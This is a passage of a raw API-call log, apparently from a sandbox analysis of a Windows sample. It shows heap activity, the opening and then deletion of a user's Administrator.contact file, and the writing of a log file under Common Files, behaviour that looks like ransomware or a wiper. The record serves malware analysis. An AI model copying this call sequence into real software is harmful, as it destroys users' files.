hHeap=0x650000) returned 1 [0074.856] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68de50 [0074.856] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e330 [0074.858] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb388 [0074.858] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e2e8 [0074.858] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e3f0 [0074.858] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb3f8 [0074.858] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e3f0 | out: hHeap=0x650000) returned 1 [0074.858] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3f8 | out: hHeap=0x650000) returned 1 [0074.858] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68dfb8 [0074.858] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e3f0 [0074.858] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb3f8 [0074.858] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e210 [0074.858] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e228 [0074.858] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb378 [0074.858] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e228 | out: hHeap=0x650000) returned 1 [0074.858] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb378 | out: hHeap=0x650000) returned 1 [0074.858] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0074.858] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb378 [0074.859] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68de28 [0074.859] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e228 [0074.859] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb478 [0074.859] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb478 | out: hHeap=0x650000) returned 1 [0074.859] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e480 [0074.859] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb478 [0074.859] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb478 | out: hHeap=0x650000) returned 1 [0074.859] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e228 | out: hHeap=0x650000) returned 1 [0074.859] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e480 | out: hHeap=0x650000) returned 1 [0074.859] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68de28 | out: hHeap=0x650000) returned 1 [0074.859] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb478 [0074.859] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x18) returned 0x6f96a8 [0074.859] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6f96a8 | out: hHeap=0x650000) returned 1 [0074.859] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb478 | out: hHeap=0x650000) returned 1 [0074.859] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb378 | out: hHeap=0x650000) returned 1 [0074.859] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0074.859] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb378 [0074.859] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68de28 [0074.859] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e480 [0074.859] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb478 [0074.859] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb478 | out: hHeap=0x650000) returned 1 [0074.859] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e228 [0074.859] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb478 [0074.860] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb478 | out: hHeap=0x650000) returned 1 [0074.860] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e480 | out: hHeap=0x650000) returned 1 [0074.860] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e228 | out: hHeap=0x650000) returned 1 [0074.860] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68de28 | out: hHeap=0x650000) returned 1 [0074.860] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb478 [0074.860] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x18) returned 0x6f96a8 [0074.860] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6f96a8 | out: hHeap=0x650000) returned 1 [0074.860] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb478 | out: hHeap=0x650000) returned 1 [0074.860] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb378 | out: hHeap=0x650000) returned 1 [0074.860] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68de28 [0074.860] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0xc) returned 0x76e228 [0074.860] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e480 [0074.860] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0xc) returned 0x76ae80 [0074.860] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0xc) returned 0x76e318 [0074.860] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0xc) returned 0x76b090 [0074.860] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0xc) returned 0x76df58 [0074.860] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68de28 | out: hHeap=0x650000) returned 1 [0074.860] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb478 | out: hHeap=0x650000) returned 1 [0074.860] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb478 | out: hHeap=0x650000) returned 1 [0074.860] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e180 | out: hHeap=0x650000) returned 1 [0074.860] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76dfe8 | out: hHeap=0x650000) returned 1 [0074.861] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68de28 | out: hHeap=0x650000) returned 1 [0074.861] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb378 | out: hHeap=0x650000) returned 1 [0074.861] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e480 | out: hHeap=0x650000) returned 1 [0074.861] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e228 | out: hHeap=0x650000) returned 1 [0074.861] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ae80 | out: hHeap=0x650000) returned 1 [0074.861] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e318 | out: hHeap=0x650000) returned 1 [0074.861] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b090 | out: hHeap=0x650000) returned 1 [0074.861] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a970 | out: hHeap=0x650000) returned 1 [0074.861] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76df58 | out: hHeap=0x650000) returned 1 [0074.861] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b198 | out: hHeap=0x650000) returned 1 [0074.861] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e198 | out: hHeap=0x650000) returned 1 [0074.861] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76dfd0 | out: hHeap=0x650000) returned 1 [0074.861] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e1b0 | out: hHeap=0x650000) returned 1 [0074.861] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e1f8 | out: hHeap=0x650000) returned 1 [0074.861] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x74b5d0 | out: hHeap=0x650000) returned 1 [0074.861] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0074.861] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb478 | out: hHeap=0x650000) returned 1 [0074.861] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb478 | out: hHeap=0x650000) returned 1 [0074.861] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e1f8 | out: hHeap=0x650000) returned 1 [0074.861] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e1b0 | out: hHeap=0x650000) returned 1 [0074.861] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68de28 | out: hHeap=0x650000) returned 1 [0074.861] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6f96a8 | out: hHeap=0x650000) returned 1 [0074.861] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb478 | out: hHeap=0x650000) returned 1 [0074.861] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb378 | out: hHeap=0x650000) returned 1 [0074.862] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68de28 | out: hHeap=0x650000) returned 1 [0074.862] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb478 | out: hHeap=0x650000) returned 1 [0074.862] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb478 | out: hHeap=0x650000) returned 1 [0074.862] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76dfe8 | out: hHeap=0x650000) returned 1 [0074.862] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e180 | out: hHeap=0x650000) returned 1 [0074.862] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68de28 | out: hHeap=0x650000) returned 1 [0074.862] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb378 | out: hHeap=0x650000) returned 1 [0074.862] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e1f8 | out: hHeap=0x650000) returned 1 [0074.862] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e1b0 | out: hHeap=0x650000) returned 1 [0074.862] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76dfd0 | out: hHeap=0x650000) returned 1 [0074.862] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e198 | out: hHeap=0x650000) returned 1 [0074.862] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b198 | out: hHeap=0x650000) returned 1 [0074.862] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a970 | out: hHeap=0x650000) returned 1 [0074.862] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76df58 | out: hHeap=0x650000) returned 1 [0074.862] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b090 | out: hHeap=0x650000) returned 1 [0074.862] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ae80 | out: hHeap=0x650000) returned 1 [0074.862] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e318 | out: hHeap=0x650000) returned 1 [0074.862] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e228 | out: hHeap=0x650000) returned 1 [0074.862] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e480 | out: hHeap=0x650000) returned 1 [0074.862] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x74b5d0 | out: hHeap=0x650000) returned 1 [0074.862] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0074.862] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb478 | out: hHeap=0x650000) returned 1 [0074.862] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb478 | out: hHeap=0x650000) returned 1 [0074.862] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e480 | out: hHeap=0x650000) returned 1 [0074.862] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e228 | out: hHeap=0x650000) returned 1 [0074.863] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68de28 | out: hHeap=0x650000) returned 1 [0074.863] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6f96a8 | out: hHeap=0x650000) returned 1 [0074.863] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb478 | out: hHeap=0x650000) returned 1 [0074.863] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb378 | out: hHeap=0x650000) returned 1 [0074.863] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0074.863] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb478 | out: hHeap=0x650000) returned 1 [0074.863] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb478 | out: hHeap=0x650000) returned 1 [0074.863] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e228 | out: hHeap=0x650000) returned 1 [0074.863] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e480 | out: hHeap=0x650000) returned 1 [0074.863] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68de28 | out: hHeap=0x650000) returned 1 [0074.863] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6f96a8 | out: hHeap=0x650000) returned 1 [0074.863] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb478 | out: hHeap=0x650000) returned 1 [0074.863] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb378 | out: hHeap=0x650000) returned 1 [0074.863] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0074.863] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb478 | out: hHeap=0x650000) returned 1 [0074.863] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb478 | out: hHeap=0x650000) returned 1 [0074.863] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e480 | out: hHeap=0x650000) returned 1 [0074.863] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e228 | out: hHeap=0x650000) returned 1 [0074.863] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68de28 | out: hHeap=0x650000) returned 1 [0074.863] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6f96a8 | out: hHeap=0x650000) returned 1 [0074.863] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0074.864] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0074.864] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0074.864] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0074.864] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0074.864] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0074.864] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0074.864] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0074.864] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0074.864] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0074.864] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76d30000 [0074.866] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\Administrator.contact" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\administrator.contact"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x128 [0074.866] FreeLibrary (hLibModule=0x76d30000) returned 1 [0074.866] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0074.866] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0074.867] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0074.867] CharUpperBuffW (in: lpsz="_WINAPI_WRITEFILE", cchLength=0x11 | out: lpsz="_WINAPI_WRITEFILE") returned 0x11 [0074.867] PeekMessageW (in: lpMsg=0x61ebcc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ebcc) returned 0 [0074.867] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0074.867] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76d30000 [0074.869] FreeLibrary (hLibModule=0x76d30000) returned 1 [0074.869] PeekMessageW (in: lpMsg=0x61ebcc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ebcc) returned 0 [0074.870] PeekMessageW (in: lpMsg=0x61ebcc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ebcc) returned 0 [0074.870] PeekMessageW (in: lpMsg=0x61ebcc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ebcc) returned 0 [0074.870] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0074.870] CharUpperBuffW (in: lpsz="_WINAPI_CLOSEHANDLE", cchLength=0x13 | out: lpsz="_WINAPI_CLOSEHANDLE") returned 0x13 [0074.870] PeekMessageW (in: lpMsg=0x61ebcc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ebcc) returned 0 [0074.870] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0074.870] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76d30000 [0074.870] FreeLibrary (hLibModule=0x76d30000) returned 1 [0074.871] PeekMessageW (in: lpMsg=0x61ebcc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ebcc) returned 0 [0074.871] PeekMessageW (in: lpMsg=0x61ebcc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ebcc) returned 0 [0074.871] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0074.871] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\Administrator.contact", nBufferLength=0x7fff, lpBuffer=0x60ea80, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\Administrator.contact", lpFilePart=0x0) returned 0x3c [0074.871] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\Administrator.contact", lpFindFileData=0x61eac8 | out: lpFindFileData=0x61eac8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xc964fbc0, ftLastWriteTime.dwHighDateTime=0x1d661bd, nFileSizeHigh=0x0, nFileSizeLow=0x10b1e, dwReserved0=0x63f910, dwReserved1=0x77cb1ecd, cFileName="Administrator.contact", cAlternateFileName="ADMINI~1.CON")) returned 0x6b8b38 [0074.872] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\Administrator.contact" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\administrator.contact")) returned 1 [0074.873] FindNextFileW (in: hFindFile=0x6b8b38, lpFindFileData=0x61eac8 | out: lpFindFileData=0x61eac8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xc964fbc0, ftLastWriteTime.dwHighDateTime=0x1d661bd, nFileSizeHigh=0x0, nFileSizeLow=0x10b1e, dwReserved0=0x63f910, dwReserved1=0x77cb1ecd, cFileName="Administrator.contact", cAlternateFileName="ADMINI~1.CON")) returned 0 [0074.874] FindClose (in: hFindFile=0x6b8b38 | out: hFindFile=0x6b8b38) returned 1 [0074.874] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0074.874] PeekMessageW (in: lpMsg=0x61f07c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f07c) returned 0 [0074.874] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0074.874] PeekMessageW (in: lpMsg=0x61ec4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ec4c) returned 0 [0074.874] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="t", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0074.874] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ct", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0074.874] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="act", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0074.874] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="tact", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0074.874] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ntact", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0074.874] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ontact", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0074.874] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="contact", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0074.874] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".contact", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0074.874] PeekMessageW (in: lpMsg=0x61ec4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ec4c) returned 0 [0074.874] PeekMessageW (in: lpMsg=0x61ec4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ec4c) returned 0 [0074.874] PeekMessageW (in: lpMsg=0x61ec4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ec4c) returned 0 [0074.875] PeekMessageW (in: lpMsg=0x61ec4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ec4c) returned 0 [0074.876] CreateFileW (lpFileName="C:\\PROGRA~2\\COMMON~1\\log.txt" (normalized: "c:\\progra~2\\common~1\\log.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0074.877] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0074.877] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x61eedc | out: lpNewFilePointer=0x0) returned 1 [0074.877] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0074.877] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x61eebc | out: lpNewFilePointer=0x0) returned 1 [0074.878] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690770 [0074.878] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10000) returned 0x781ff0 [0074.878] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6908e0 [0074.878] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690770 | out: hHeap=0x650000) returned 1 [0074.878] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x61eecc | out: lpNewFilePointer=0x0) returned 1 [0074.878] ReadFile (in: hFile=0x128, lpBuffer=0x771fe8, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x61eef4, lpOverlapped=0x0 | out: lpBuffer=0x771fe8*, lpNumberOfBytesRead=0x61eef4*=0x0, lpOverlapped=0x0) returned 1 [0074.879] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0074.879] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x61eebc | out: lpNewFilePointer=0x0) returned 1 [0074.879] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6908e0 | out: hHeap=0x650000) returned 1 [0074.879] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x781ff0 | out: hHeap=0x650000) returned 1 [0074.879] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ab98 [0074.879] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6908e0 [0074.879] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS 